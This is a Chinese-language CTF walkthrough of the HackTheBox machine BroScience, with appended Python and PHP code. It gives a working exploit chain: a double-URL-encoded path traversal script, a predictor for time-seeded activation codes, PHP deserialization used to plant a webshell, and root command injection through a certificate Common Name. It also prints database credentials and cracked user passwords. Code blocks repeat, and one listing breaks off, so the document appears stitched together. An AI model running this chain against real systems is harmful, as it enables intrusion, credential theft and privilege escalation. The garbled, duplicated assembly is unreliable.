[原创]HTB BroScience (MEDIUM)
发表于: 2023-2-15 23:24 3630


图片描述
域名https://broscience.htb/
图片描述
图片描述
扫一下目录。站点是 PHP 写的,所以用 `FUZZ.php` 的形式枚举 PHP 文件(命令见文末)。

图片描述
访问 includes 目录可以直接看到目录列表(目录遍历没有关闭),其中有 img.php、utils.php、db_connect.php 等文件。
图片描述
直接访问 img.php 返回 `Missing 'path' parameter.`,说明它根据 path 参数读取文件,可能存在文件包含 / 任意文件读取。
图片描述
直接尝试 `path=../../../../etc/passwd`,被过滤拦截。
图片描述
尝试绕过:对路径做两次 URL 编码(`.` → `%2e` → `%25%32%65`)后成功读到文件。推测是过滤在第一次解码后的值上检查 `../`,而真正打开文件前服务端又多解了一次码。
图片描述
可以写一个 Python 脚本(下文的 bor.py)把双重 URL 编码和请求自动化,用来读取任意文件。

utils.php 里的 generate_activation_code() 用 `srand(time())` 做种子、再用 `rand()` 挑 32 个字符生成激活码,种子只是生成那一刻的 Unix 时间戳,因此激活码是可预测的。
只要知道注册请求被处理时的服务器时间(响应头里的 Date 就是这个时间),用同样的逻辑和同样的种子重新跑一遍,就能得到同一个激活码。

nJtB6ePyeQMj1XhptS0poMBMhncDC2of
图片描述
再看下activate.php中的内容

把自己算出来的激活码作为 code 参数发给 activate.php,账户即被激活。
图片描述
在 utils.php 中找到了 get_theme() 函数:它把 user-prefs cookie 做 base64_decode 之后直接 unserialize(),而 cookie 完全由客户端控制、没有签名也没有限制类名,因此存在 PHP 反序列化(对象注入)漏洞。注意只有已登录($_SESSION['id'] 存在)时才会走到这段逻辑。

同一个文件里还有 Avatar 和 AvatarInterface 两个类:AvatarInterface::__wakeup() 会 new Avatar($imgPath) 并调用 save($tmp),而 save() 用 file_get_contents($tmp) 读取内容后写入 $imgPath,两个路径都没有任何校验。

现在只需要构造一个 AvatarInterface 对象:tmp 指向我们可控的内容(如自己服务器上的 webshell 源码),imgPath 指向服务器上可写、且能通过 web 访问的 .php 路径;序列化后 base64 编码写入 user-prefs cookie,以已登录用户身份触发 get_theme(),unserialize() 调用 __wakeup() 时就会把文件写到服务器上。

图片描述
图片描述

用同样的任意文件读取查看 db_connect.php,可以拿到数据库账号密码:
dbuser:RangeOfMotion%777

图片描述

连上数据库拿到用户密码 hash 后,发现密码前面拼了固定的 salt(`NaCl`)再做 hash;于是把字典里的每个词前面都加上这个 salt 再跑破解。
图片描述

NaCliluvhorsesandgym ( bill)
NaClAaronthehottest ( dmytro)
NaCl2applesplus2apples ( michael)
去掉前缀 `NaCl` 就是明文密码,用它登录机器即可(后面的提权涉及 /home/bill/Certs,对应的是用户 bill)。
图片描述
图片描述
运行 linpeas.sh 可以看到一个以 root 身份运行的脚本 renew_cert.sh。
图片描述

脚本把证书的 Common Name 原样拼进 `mv` 命令(`$commonName.crt`)并交给 `/bin/bash -c` 执行,没有任何转义或过滤;在双引号里 `$(...)` 仍会被展开。所以用脚本里同样的 openssl 命令生成一张其它字段全部留空、Common Name 里带命令替换(`$(...)`)的证书,放到脚本会处理的位置,脚本以 root 身份处理它时就会执行我们的命令。
openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /tmp/temp.key -out /tmp/temp.crt -days 365 <<<"$country
/bin/bash -c "mv /tmp/temp.crt /home/bill/Certs/$commonName.crt"

图片描述
参考链接:https://medium.com/@Kushagra007/broscience-hackthebox-d26fa3e24ab

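# Enumerate PHP files: the site is PHP, so append .php to every wordlist entry.
# raft-medium-directories is used as a generic name list; raft-medium-files.txt
# is the other obvious candidate. (The same command was pasted twice in the
# original post; one run is enough.)
ffuf -w wordlist/SecLists-master/Discovery/Web-Content/raft-medium-directories.txt -u https://broscience.htb/FUZZ.php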
#!/usr/bin/python3
import requests, sys, warnings
 
warnings.simplefilter("ignore")
 
# Require exactly the file path argument; print usage (with ANSI colours) and bail out otherwise.
if not sys.argv[1:]:
    print(f"\n\033[1;37m[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <file>\n")
    sys.exit(1)
 
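def doubleurlencode(string):
    """Percent-encode every byte of *string* twice.

    Every character (not just reserved ones) becomes ``%XX``, and the
    resulting ``%`` and hex digits are then encoded again, so ``"."`` turns
    into ``%2e`` and finally ``%25%32%65``. This is the bypass used against
    img.php: its traversal filter rejects ``../`` in the once-decoded
    parameter, but the file is opened after a further round of decoding.

    Args:
        string: text to encode; non-ASCII characters are encoded as their
            UTF-8 bytes (percent-encoding is byte based).

    Returns:
        The double-encoded string; ``""`` for ``""``.
    """

    def _encode_bytes(data):
        # Always emit two hex digits. The original used hex(ord(c))[2:],
        # which produced "%9" instead of "%09" for bytes below 0x10.
        return "".join(f"%{b:02x}" for b in data)

    first_pass = _encode_bytes(string.encode("utf-8"))
    # The first pass only yields '%' and hex digits, so ASCII is enough here.
    return _encode_bytes(first_pass.encode("ascii"))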
 
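# Four levels of "../" are enough to climb from the include directory to /;
# the target path is taken verbatim from the command line (e.g. /etc/passwd).
dpt = doubleurlencode("../../../../")
file = doubleurlencode(sys.argv[1])

# img.php serves whatever file ?path= names; the double encoding slips past
# its "../" filter. verify=False because the lab host's TLS certificate is not
# trusted by default. A timeout keeps the script from hanging forever on a
# dead host (the original had none).
target = "https://broscience.htb/includes/img.php?path="
request = requests.get(target + dpt + file, verify=False, timeout=10)
response = request.text

print(response.strip())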
#!/usr/bin/python3
import requests, sys, warnings
 
warnings.simplefilter("ignore")
 
# Require exactly the file path argument; print usage (with ANSI colours) and bail out otherwise.
if not sys.argv[1:]:
    print(f"\n\033[1;37m[\033[1;31m-\033[1;37m] Usage: python3 {sys.argv[0]} <file>\n")
    sys.exit(1)
 
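def doubleurlencode(string):
    """Percent-encode every byte of *string* twice.

    Every character (not just reserved ones) becomes ``%XX``, and the
    resulting ``%`` and hex digits are then encoded again, so ``"."`` turns
    into ``%2e`` and finally ``%25%32%65``. This is the bypass used against
    img.php: its traversal filter rejects ``../`` in the once-decoded
    parameter, but the file is opened after a further round of decoding.

    Args:
        string: text to encode; non-ASCII characters are encoded as their
            UTF-8 bytes (percent-encoding is byte based).

    Returns:
        The double-encoded string; ``""`` for ``""``.
    """

    def _encode_bytes(data):
        # Always emit two hex digits. The original used hex(ord(c))[2:],
        # which produced "%9" instead of "%09" for bytes below 0x10.
        return "".join(f"%{b:02x}" for b in data)

    first_pass = _encode_bytes(string.encode("utf-8"))
    # The first pass only yields '%' and hex digits, so ASCII is enough here.
    return _encode_bytes(first_pass.encode("ascii"))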
 
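# Four levels of "../" are enough to climb from the include directory to /;
# the target path is taken verbatim from the command line (e.g. /etc/passwd).
dpt = doubleurlencode("../../../../")
file = doubleurlencode(sys.argv[1])

# img.php serves whatever file ?path= names; the double encoding slips past
# its "../" filter. verify=False because the lab host's TLS certificate is not
# trusted by default. A timeout keeps the script from hanging forever on a
# dead host (the original had none).
target = "https://broscience.htb/includes/img.php?path="
request = requests.get(target + dpt + file, verify=False, timeout=10)
response = request.text

print(response.strip())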
<?php
/**
 * Build a 32-character activation code from [a-zA-Z0-9].
 *
 * SECURITY (the weakness this writeup exploits): the generator is seeded
 * with srand(time()) — the current Unix second — and then driven by rand(),
 * which is not a cryptographic RNG. Anyone who knows or can guess the second
 * the code was generated (e.g. from the Date header of the registration
 * response) can re-run this loop with the same seed and obtain the same
 * code. A real implementation should use random_int()/random_bytes() and no
 * explicit seed.
 */
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(time());  // seed == current timestamp: fully predictable
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        // After a known seed every rand() value is deterministic.
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}
 
// Source: https://stackoverflow.com/a/4420773 (Slightly adapted)
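/**
 * Human-readable distance between two times, e.g. "3 days ago" or
 * "1 minute from now".
 *
 * @param int|string      $from Unix timestamp or a strtotime()-parsable string.
 * @param int|string|null $to   Reference time; null means now.
 * @return string Only the largest unit is reported ("2 weeks ago", never
 *                "2 weeks, 3 days ago"); "Just now" when the difference is
 *                under one second.
 *
 * NOTE(review): strtotime() returns false for an unparsable string, which the
 * arithmetic below silently treats as 0; callers must pass valid input.
 *
 * Fix versus the pasted listing: the "month" entry was missing its trailing
 * comma, which makes the array literal a parse error.
 */
function rel_time($from, $to = null) {
    $to = (($to === null) ? (time()) : ($to));
    $to = ((is_int($to)) ? ($to) : (strtotime($to)));
    $from = ((is_int($from)) ? ($from) : (strtotime($from)));

    // Fixed-size units, largest first: a month is 4 weeks, a year 12 such months.
    $units = array
    (
        "year"   => 29030400, // seconds in a year   (12 months)
        "month"  => 2419200,  // seconds in a month  (4 weeks)
        "week"   => 604800,   // seconds in a week   (7 days)
        "day"    => 86400,    // seconds in a day    (24 hours)
        "hour"   => 3600,     // seconds in an hour  (60 minutes)
        "minute" => 60,       // seconds in a minute (60 seconds)
        "second" => 1         // 1 second
    );

    $diff = abs($from - $to);

    if ($diff < 1) {
        return "Just now";
    }

    $suffix = (($from > $to) ? ("from now") : ("ago"));

    // $unitCount < 1 below stops after the first (largest) matching unit.
    $unitCount = 0;
    $output = "";

    foreach($units as $unit => $mult)
        if($diff >= $mult && $unitCount < 1) {
            $unitCount += 1;
            // $and = (($mult != 1) ? ("") : ("and "));
            $and = "";
            $output .= ", ".$and.intval($diff / $mult)." ".$unit.((intval($diff / $mult) == 1) ? ("") : ("s"));
            $diff -= intval($diff / $mult) * $mult;
        }

    $output .= " ".$suffix;
    // Drop the leading ", " that the loop always prepends.
    $output = substr($output, strlen(", "));

    return $output;
}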
 
/**
 * Theme preference carried in the user-prefs cookie as base64(serialize()).
 *
 * Harmless by itself; the problem is that the cookie is unserialized without
 * restricting the class (see get_theme()), so any other class can be
 * substituted for this one.
 */
class UserPrefs {
    public $theme;  // theme name; defaults to "light"

    public function __construct($theme = "light") {
                $this->theme = $theme;
    }
}
 
/**
 * Return the current user's theme name, read from the "user-prefs" cookie.
 *
 * Only consulted for logged-in users ($_SESSION['id'] set); everyone else
 * gets "light". If the cookie is absent a default UserPrefs is serialized
 * into it.
 *
 * SECURITY (the bug this writeup exploits): the cookie value is base64-decoded
 * and passed straight to unserialize(). A cookie is attacker-controlled, it is
 * not signed, and no allowed_classes restriction is given, so any class in
 * scope — e.g. AvatarInterface below, whose __wakeup() writes a file — can be
 * instantiated with attacker-chosen properties (PHP object injection). Fix:
 * store the theme as a plain string, or use json_decode(), or at minimum
 * unserialize($x, ['allowed_classes' => false]).
 */
function get_theme() {
    if (isset($_SESSION['id'])) {
        if (!isset($_COOKIE['user-prefs'])) {
            $up_cookie = base64_encode(serialize(new UserPrefs()));
            setcookie('user-prefs', $up_cookie);
        } else {
            // Attacker-controlled input.
            $up_cookie = $_COOKIE['user-prefs'];
        }
        // Object-injection sink: __wakeup() of whatever class the cookie names runs here.
        $up = unserialize(base64_decode($up_cookie));
        return $up->theme;
    } else {
        return "light";
    }
}
 
/**
 * Map a theme name to its CSS class.
 *
 * strcmp() returns 0 only when the strings are equal, so every theme other
 * than "light" yields "uk-light" and "light" itself yields "uk-dark".
 * Presumably intentional (UIkit's uk-light class means light text on a dark
 * background) — noted here because it reads as inverted at first glance.
 *
 * @param string|null $theme theme name; null means read it via get_theme().
 */
function get_theme_class($theme = null) {
    if (!isset($theme)) {
        $theme = get_theme();
    }
    if (strcmp($theme, "light")) {
        return "uk-light";
    } else {
        return "uk-dark";
    }
}
 
/**
 * Persist the theme choice of a logged-in user by rewriting the user-prefs
 * cookie with a serialized UserPrefs($val).
 *
 * The cookie is set with no expiry, path, Secure or HttpOnly attribute and is
 * not signed; whatever comes back is later trusted by get_theme().
 */
function set_theme($val) {
    if (isset($_SESSION['id'])) {
        setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
    }
}
 
/**
 * Copies a file's contents to a fixed destination path.
 *
 * Reachable from unserialize() through AvatarInterface::__wakeup() below,
 * which makes both paths attacker-controlled.
 */
class Avatar {
    public $imgPath;  // destination path, opened with fopen(..., "w")

    public function __construct($imgPath) {
        $this->imgPath = $imgPath;
    }

    /**
     * Read $tmp with file_get_contents() and overwrite $this->imgPath with it.
     *
     * Neither path is validated: $tmp may be any file the web server can read
     * (or a URL, if allow_url_fopen is on — not visible here) and $imgPath any
     * path it can write. With attacker-chosen values this is an arbitrary file
     * write, e.g. dropping a .php file under the web root. fopen() failure is
     * not checked either ($f would be false).
     */
    public function save($tmp) {
        $f = fopen($this->imgPath, "w");
        fwrite($f, file_get_contents($tmp));
        fclose($f);
    }
}
 
/**
 * Deserialization gadget.
 *
 * Both properties are public, so a serialized AvatarInterface placed in the
 * user-prefs cookie sets them to attacker-chosen values; unserialize() then
 * calls __wakeup(), which copies $tmp to $imgPath via Avatar::save(). This is
 * the chain get_theme() exposes.
 */
class AvatarInterface {
    public $tmp;      // source: read by file_get_contents() in Avatar::save()
    public $imgPath;  // destination: opened for writing

    // Runs automatically during unserialize(); no auth or validation here.
    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
?>
<?php
/**
 * Build a 32-character activation code from [a-zA-Z0-9].
 *
 * SECURITY (the weakness this writeup exploits): the generator is seeded
 * with srand(time()) — the current Unix second — and then driven by rand(),
 * which is not a cryptographic RNG. Anyone who knows or can guess the second
 * the code was generated (e.g. from the Date header of the registration
 * response) can re-run this loop with the same seed and obtain the same
 * code. A real implementation should use random_int()/random_bytes() and no
 * explicit seed.
 */
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(time());  // seed == current timestamp: fully predictable
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        // After a known seed every rand() value is deterministic.
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}
 
// Source: https://stackoverflow.com/a/4420773 (Slightly adapted)
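/**
 * Human-readable distance between two times, e.g. "3 days ago" or
 * "1 minute from now".
 *
 * @param int|string      $from Unix timestamp or a strtotime()-parsable string.
 * @param int|string|null $to   Reference time; null means now.
 * @return string Only the largest unit is reported ("2 weeks ago", never
 *                "2 weeks, 3 days ago"); "Just now" when the difference is
 *                under one second.
 *
 * NOTE(review): strtotime() returns false for an unparsable string, which the
 * arithmetic below silently treats as 0; callers must pass valid input.
 *
 * Fix versus the pasted listing: the "month" entry was missing its trailing
 * comma, which makes the array literal a parse error.
 */
function rel_time($from, $to = null) {
    $to = (($to === null) ? (time()) : ($to));
    $to = ((is_int($to)) ? ($to) : (strtotime($to)));
    $from = ((is_int($from)) ? ($from) : (strtotime($from)));

    // Fixed-size units, largest first: a month is 4 weeks, a year 12 such months.
    $units = array
    (
        "year"   => 29030400, // seconds in a year   (12 months)
        "month"  => 2419200,  // seconds in a month  (4 weeks)
        "week"   => 604800,   // seconds in a week   (7 days)
        "day"    => 86400,    // seconds in a day    (24 hours)
        "hour"   => 3600,     // seconds in an hour  (60 minutes)
        "minute" => 60,       // seconds in a minute (60 seconds)
        "second" => 1         // 1 second
    );

    $diff = abs($from - $to);

    if ($diff < 1) {
        return "Just now";
    }

    $suffix = (($from > $to) ? ("from now") : ("ago"));

    // $unitCount < 1 below stops after the first (largest) matching unit.
    $unitCount = 0;
    $output = "";

    foreach($units as $unit => $mult)
        if($diff >= $mult && $unitCount < 1) {
            $unitCount += 1;
            // $and = (($mult != 1) ? ("") : ("and "));
            $and = "";
            $output .= ", ".$and.intval($diff / $mult)." ".$unit.((intval($diff / $mult) == 1) ? ("") : ("s"));
            $diff -= intval($diff / $mult) * $mult;
        }

    $output .= " ".$suffix;
    // Drop the leading ", " that the loop always prepends.
    $output = substr($output, strlen(", "));

    return $output;
}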
 
/**
 * Theme preference carried in the user-prefs cookie as base64(serialize()).
 *
 * Harmless by itself; the problem is that the cookie is unserialized without
 * restricting the class (see get_theme()), so any other class can be
 * substituted for this one.
 */
class UserPrefs {
    public $theme;  // theme name; defaults to "light"

    public function __construct($theme = "light") {
                $this->theme = $theme;
    }
}
 
/**
 * Return the current user's theme name, read from the "user-prefs" cookie.
 *
 * Only consulted for logged-in users ($_SESSION['id'] set); everyone else
 * gets "light". If the cookie is absent a default UserPrefs is serialized
 * into it.
 *
 * SECURITY (the bug this writeup exploits): the cookie value is base64-decoded
 * and passed straight to unserialize(). A cookie is attacker-controlled, it is
 * not signed, and no allowed_classes restriction is given, so any class in
 * scope — e.g. AvatarInterface below, whose __wakeup() writes a file — can be
 * instantiated with attacker-chosen properties (PHP object injection). Fix:
 * store the theme as a plain string, or use json_decode(), or at minimum
 * unserialize($x, ['allowed_classes' => false]).
 */
function get_theme() {
    if (isset($_SESSION['id'])) {
        if (!isset($_COOKIE['user-prefs'])) {
            $up_cookie = base64_encode(serialize(new UserPrefs()));
            setcookie('user-prefs', $up_cookie);
        } else {
            // Attacker-controlled input.
            $up_cookie = $_COOKIE['user-prefs'];
        }
        // Object-injection sink: __wakeup() of whatever class the cookie names runs here.
        $up = unserialize(base64_decode($up_cookie));
        return $up->theme;
    } else {
        return "light";
    }
}
 
/**
 * Map a theme name to its CSS class.
 *
 * strcmp() returns 0 only when the strings are equal, so every theme other
 * than "light" yields "uk-light" and "light" itself yields "uk-dark".
 * Presumably intentional (UIkit's uk-light class means light text on a dark
 * background) — noted here because it reads as inverted at first glance.
 *
 * @param string|null $theme theme name; null means read it via get_theme().
 */
function get_theme_class($theme = null) {
    if (!isset($theme)) {
        $theme = get_theme();
    }
    if (strcmp($theme, "light")) {
        return "uk-light";
    } else {
        return "uk-dark";
    }
}
 
/**
 * Persist the theme choice of a logged-in user by rewriting the user-prefs
 * cookie with a serialized UserPrefs($val).
 *
 * The cookie is set with no expiry, path, Secure or HttpOnly attribute and is
 * not signed; whatever comes back is later trusted by get_theme().
 */
function set_theme($val) {
    if (isset($_SESSION['id'])) {
        setcookie('user-prefs',base64_encode(serialize(new UserPrefs($val))));
    }
}
 
/**
 * Copies a file's contents to a fixed destination path.
 *
 * Reachable from unserialize() through AvatarInterface::__wakeup() below,
 * which makes both paths attacker-controlled.
 */
class Avatar {
    public $imgPath;  // destination path, opened with fopen(..., "w")

    public function __construct($imgPath) {
        $this->imgPath = $imgPath;
    }

    /**
     * Read $tmp with file_get_contents() and overwrite $this->imgPath with it.
     *
     * Neither path is validated: $tmp may be any file the web server can read
     * (or a URL, if allow_url_fopen is on — not visible here) and $imgPath any
     * path it can write. With attacker-chosen values this is an arbitrary file
     * write, e.g. dropping a .php file under the web root. fopen() failure is
     * not checked either ($f would be false).
     */
    public function save($tmp) {
        $f = fopen($this->imgPath, "w");
        fwrite($f, file_get_contents($tmp));
        fclose($f);
    }
}
 
/**
 * Deserialization gadget.
 *
 * Both properties are public, so a serialized AvatarInterface placed in the
 * user-prefs cookie sets them to attacker-chosen values; unserialize() then
 * calls __wakeup(), which copies $tmp to $imgPath via Avatar::save(). This is
 * the chain get_theme() exposes.
 */
class AvatarInterface {
    public $tmp;      // source: read by file_get_contents() in Avatar::save()
    public $imgPath;  // destination: opened for writing

    // Runs automatically during unserialize(); no auth or validation here.
    public function __wakeup() {
        $a = new Avatar($this->imgPath);
        $a->save($this->tmp);
    }
}
?>
# Dump the target's utils.php through the img.php file read (bor.py double-encodes the path); first 10 lines only.
python bor.py /var/www/html/includes/utils.php | head -n10
<?php
/**
 * Build a 32-character activation code from [a-zA-Z0-9].
 *
 * SECURITY: seeded with srand(time()) — the current Unix second — and driven
 * by rand(), which is not a cryptographic RNG. Knowing the second the code
 * was generated is enough to regenerate it (see the script further down).
 */
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(time());  // seed == current timestamp: fully predictable
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        // After a known seed every rand() value is deterministic.
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}
# Dump the target's utils.php through the img.php file read (bor.py double-encodes the path); first 10 lines only.
python bor.py /var/www/html/includes/utils.php | head -n10
<?php
/**
 * Build a 32-character activation code from [a-zA-Z0-9].
 *
 * SECURITY: seeded with srand(time()) — the current Unix second — and driven
 * by rand(), which is not a cryptographic RNG. Knowing the second the code
 * was generated is enough to regenerate it (see the script further down).
 */
function generate_activation_code() {
    $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
    srand(time());  // seed == current timestamp: fully predictable
    $activation_code = "";
    for ($i = 0; $i < 32; $i++) {
        // After a known seed every rand() value is deterministic.
        $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
    }
    return $activation_code;
}
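<?php
// Re-derive the activation code that generate_activation_code() produced.
// The app seeds with srand(time()), so the only "secret" is the server clock
// at registration time; take it from the Date header of the registration
// response (HTTP-date, GMT) and feed it to strtotime() to get the same seed.
//
// Usage: php gen.php ["Wed, 15 Feb 2023 14:32:36 GMT"]
// Without an argument the hard-coded date below is used (original behaviour).
//
// NOTE(review): rand()'s underlying algorithm may differ between PHP
// versions; run this under the same PHP major version as the target or the
// 32 characters will not match.
$date = isset($argv[1]) ? $argv[1] : "Wed, 15 Feb 2023 14:32:36 GMT";
$seed = strtotime($date);
if ($seed === false) {
    // strtotime() returns false on garbage; srand(false) would silently seed with 0.
    fwrite(STDERR, "Unparseable date: $date\n");
    exit(1);
}
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand($seed);
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
    // Same loop as the target: one rand()-chosen character per iteration.
    $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
echo $activation_code;
?>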
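<?php
// Re-derive the activation code that generate_activation_code() produced.
// The app seeds with srand(time()), so the only "secret" is the server clock
// at registration time; take it from the Date header of the registration
// response (HTTP-date, GMT) and feed it to strtotime() to get the same seed.
//
// Usage: php gen.php ["Wed, 15 Feb 2023 14:32:36 GMT"]
// Without an argument the hard-coded date below is used (original behaviour).
//
// NOTE(review): rand()'s underlying algorithm may differ between PHP
// versions; run this under the same PHP major version as the target or the
// 32 characters will not match.
$date = isset($argv[1]) ? $argv[1] : "Wed, 15 Feb 2023 14:32:36 GMT";
$seed = strtotime($date);
if ($seed === false) {
    // strtotime() returns false on garbage; srand(false) would silently seed with 0.
    fwrite(STDERR, "Unparseable date: $date\n");
    exit(1);
}
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
srand($seed);
$activation_code = "";
for ($i = 0; $i < 32; $i++) {
    // Same loop as the target: one rand()-chosen character per iteration.
    $activation_code = $activation_code . $chars[rand(0, strlen($chars) - 1)];
}
echo $activation_code;
?>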
# Read activate.php the same way to see how the code parameter is validated; first 10 lines only.
python bor.py /var/www/html/activate.php | head -n10
<?php
// Start/resume the session so $_SESSION['id'] can be checked.
session_start();

// Check if user is logged in already
if (isset($_SESSION['id'])) {
    // NOTE(review): header() only queues a redirect; without an exit after it
    // the rest of activate.php still runs for an already-logged-in user.
    header('Location: /index.php');
}
 
if (isset($_GET['code'])) {
    // Check if code is formatted correctly (regex)
# Read activate.php the same way to see how the code parameter is validated; first 10 lines only.
python bor.py /var/www/html/activate.php | head -n10
<?php
session_start();  // start/resume the PHP session (this second copy of the activate.php listing is truncated here)
